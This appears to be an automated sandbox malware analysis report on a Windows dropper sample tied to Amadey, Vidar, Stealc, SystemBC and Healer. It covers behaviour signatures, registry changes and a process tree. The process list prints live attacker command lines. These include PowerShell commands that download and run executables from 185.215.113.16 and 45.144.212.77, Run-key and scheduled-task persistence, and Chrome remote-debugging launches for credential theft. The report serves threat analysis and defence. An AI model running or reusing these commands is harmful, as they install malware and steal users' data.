Malware Analysis Report

2025-04-03 09:29

Sample ID 250302-crlqra1nt9
Target 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
Tags
092155 amadey systembc vidar ir7am credential_access defense_evasion discovery execution spyware stealer trojan gcleaner healer stealc trump dropper evasion loader persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77

Threat Level: Known bad

The file 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe was found to be: Known bad.

Malicious Activity Summary

GCleaner

Modifies Windows Defender TamperProtection settings

Vidar

Modifies Windows Defender Real-time Protection settings

Systembc family

SystemBC

Detect Vidar Stealer

Vidar family

Modifies Windows Defender DisableAntiSpyware settings

Amadey family

Detects Healer, an antivirus disabler dropper

Gcleaner family

Healer family

Stealc family

Healer

Modifies Windows Defender notification settings

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Downloads MZ/PE file

Reads user/profile data of web browsers

.NET Reactor protector

Identifies Wine through registry keys

Reads user/profile data of local email clients

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Windows security modification

Executes dropped EXE

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

AutoIT Executable

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Program crash

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Modifies registry class

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Checks processor information in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-02 02:18

Signatures

Amadey family

amadey

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-02 02:18

Reported

2025-03-02 02:21

Platform

win7-20241010-en

Max time kernel

71s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2904 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2984 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 2192 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
PID 900 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
PID 944 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe C:\Windows\SysWOW64\cmd.exe
PID 2984 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe
PID 2984 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe
PID 2984 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
PID 1640 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 1272 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
PID 2732 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2984 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe

"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"

C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe

"C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe"

C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe

C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe

"C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe"

C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe

"C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe"

C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 500

C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe

C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1036

C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe"

C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe

"C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe"

C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe

C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe

C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 500

C:\Users\Admin\AppData\Local\Temp\10057930101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10057930101\FvbuInU.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef79b9758,0x7fef79b9768,0x7fef79b9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2368 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1368 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1296 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10059480101\1ZXaFij.exe

"C:\Users\Admin\AppData\Local\Temp\10059480101\1ZXaFij.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3492 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3612 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10059490101\1ZXaFij.exe

"C:\Users\Admin\AppData\Local\Temp\10059490101\1ZXaFij.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3760 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvytlqfl.cmdline"

C:\Users\Admin\AppData\Local\Temp\10059590101\Gidqgok.exe

"C:\Users\Admin\AppData\Local\Temp\10059590101\Gidqgok.exe"

C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe

C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC50A0.tmp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 1216

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2zer-yl.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A80.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5A7F.tmp"

C:\Users\Admin\AppData\Local\Temp\10059600101\Gidqgok.exe

"C:\Users\Admin\AppData\Local\Temp\10059600101\Gidqgok.exe"

C:\Users\Admin\AppData\Local\Temp\10061070101\bwuGbC2.exe

"C:\Users\Admin\AppData\Local\Temp\10061070101\bwuGbC2.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10061080101\bwuGbC2.exe

"C:\Users\Admin\AppData\Local\Temp\10061080101\bwuGbC2.exe"

C:\Users\Admin\AppData\Local\Temp\10000490101\netdriver.exe

"C:\Users\Admin\AppData\Local\Temp\10000490101\netdriver.exe"

C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe

"C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe"

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe

C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe

"C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe"

C:\Users\Admin\AppData\Local\Temp\10062570101\b6d1c8e25e.exe

"C:\Users\Admin\AppData\Local\Temp\10062570101\b6d1c8e25e.exe"

C:\Users\Admin\AppData\Local\Temp\10062720101\7ee58999f0.exe

"C:\Users\Admin\AppData\Local\Temp\10062720101\7ee58999f0.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn Me3u4ma006G /tr "mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn Me3u4ma006G /tr "mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BGOCQVVKCX0QWYVMYADESIX7SF6FWWAB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "fEiHYmaxCUY" /tr "mshta \"C:\Temp\r2EtpuBU9.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\r2EtpuBU9.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe"

C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe

"C:/Users/Admin/AppData/Roaming/winsvcs/WindowsPrinterService.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {9A18A70E-EF90-4148-9E14-42DC99609553} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]

C:\ProgramData\nlfqre\ssomfop.exe

C:\ProgramData\nlfqre\ssomfop.exe

C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe

"C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe"

C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe

"C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe"

